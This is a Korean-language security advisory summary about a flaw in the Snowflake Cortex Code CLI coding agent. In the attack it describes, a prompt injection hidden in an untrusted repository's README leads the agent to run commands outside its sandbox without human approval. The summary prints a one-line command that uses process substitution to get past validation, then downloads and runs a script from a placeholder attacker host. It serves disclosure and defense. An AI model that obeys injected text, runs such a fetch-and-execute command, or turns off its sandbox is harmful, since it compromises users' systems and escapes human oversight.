Snowflake Cortex Code CLI 취약점으로 샌드박스 탈출 및 멀웨어 실행 가능

취약점 상세 정보

Snowflake Cortex Code CLI는 Claude Code 및 OpenAI의 Codex와 유사하게 작동하는 명령줄 코딩 에이전트로, Snowflake에서 SQL을 실행하기 위한 내장 통합 기능을 갖추고 있습니다. 출시 2일 후, Cortex Code의 명령 검증 시스템에서 취약점이 발견되었으며, 이로 인해 특별히 구성된 악성 명령이 인간 승인 단계를 트리거하지 않고 임의 명령을 실행할 수 있었으며, Cortex CLI의 샌드박스 외부에서 해당 명령을 실행할 수 있었습니다.

공격 체인

이 공격은 간접 프롬프트 인젝션을 통해 작동합니다. 사용자가 Cortex를 열고 샌드박스를 켠 후, 타사 오픈소스 코드베이스에 대한 도움을 Cortex에 요청합니다. 신뢰할 수 없는 저장소의 README에 숨겨진 프롬프트 인젝션이 Cortex를 조작하여 위험한 명령을 실행해야 한다고 믿게 만듭니다.

Cortex는 프로세스 치환 표현식 내부의 명령을 검증하지 못하여 악성 명령의 승인되지 않은 실행을 허용했습니다:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

이 명령은 공격자의 서버에서 스크립트를 다운로드하여 실행합니다. 이 우회가 작동한 이유는 다음과 같습니다:

• 프로세스 치환 <() 표현식 내부의 안전하지 않은 명령이 검증 시스템에 의해 평가되지 않았습니다
• 전체 명령이 '안전한' 명령(이 경우 cat)으로 시작했습니다
• 프로세스 치환 표현식 내부의 명령은 인간 승인을 트리거하지 않았습니다

샌드박스 우회

프롬프트 인젝션은 또한 모델을 조작하여 샌드박스 없는 명령 실행을 트리거하는 플래그를 설정합니다. Cortex는 기본적으로 샌드박스 없는 명령 실행을 트리거하는 플래그를 설정할 수 있으며, 인젝션은 이를 활용하여 악성 명령이 샌드박스 외부에서 실행되도록 허용합니다.

대응 조치

Snowflake 보안 팀은 이 취약점을 검증하고 수정하여 2026년 2월 28일에 Cortex Code CLI 버전 1.0.25로 수정 사항을 출시했습니다. Snowflake의 전체 권고 사항은 Snowflake 커뮤니티 사이트에서 확인할 수 있습니다: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

참고: 이 공격 체인은 샌드박스가 아닌 사용자에게도 적용되었습니다. 문서에 따르면 OS+일반 모드에서는 모든 명령이 사용자 승인을 요청합니다. 샌드박스에서 실행되는 명령에는 네트워크 및 파일 접근 제한도 있습니다.